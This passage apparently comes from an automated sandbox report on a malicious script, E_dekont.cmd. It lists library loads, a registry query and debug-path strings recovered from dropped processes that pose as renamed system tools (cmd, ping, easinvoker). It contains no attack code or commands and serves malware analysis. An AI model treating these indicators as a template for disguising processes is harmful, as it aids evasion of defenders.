                Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: url.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieframe.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netapi32.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wkscli.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mapi32.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: E_dekont.cmd Static file information: File size 1052051 > 1048576
                Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: wdmvmswJ.pif, 0000000C.00000003.1554599936.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msiexec.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 00000010.00000003.2977864019.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: mavinject32.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PresentationFontCache.pdb source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PerceptionSimulationService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: MsSense.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: MsSense.pdb source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 00000010.00000003.2990957366.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 00000010.00000003.2987868731.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
                Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 00000010.00000003.2986208127.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 00000010.00000003.2974357660.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
                Source: Binary string: Acrobat_SL.pdb source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1530165716.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000001.1581602644.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000000.1581239901.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
                Source: Binary string: easinvoker.pdbH source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 00000010.00000003.2985347717.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: maintenanceservice.pdb source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PerfHost.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: GoogleUpdate_unsigned.pdb source: alg.exe, 00000010.00000003.2967850181.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PerfHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 00000010.00000003.2980211327.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: TieringEngineService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: TieringEngineService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: ALG.pdb source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 00000010.00000003.2983872074.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msdtcexe.pdb source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: snmptrap.pdb source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: AppVShNotify.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msiexec.pdb source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 00000010.00000003.2983037268.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 00000010.00000003.2984642643.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: _.pdb source: wdmvmswJ.pif, 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1555508277.0000000002932000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B3F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B10000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478142210.0000000002931000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: WmiApSrv.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: Acrobat_SL.pdb((( source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
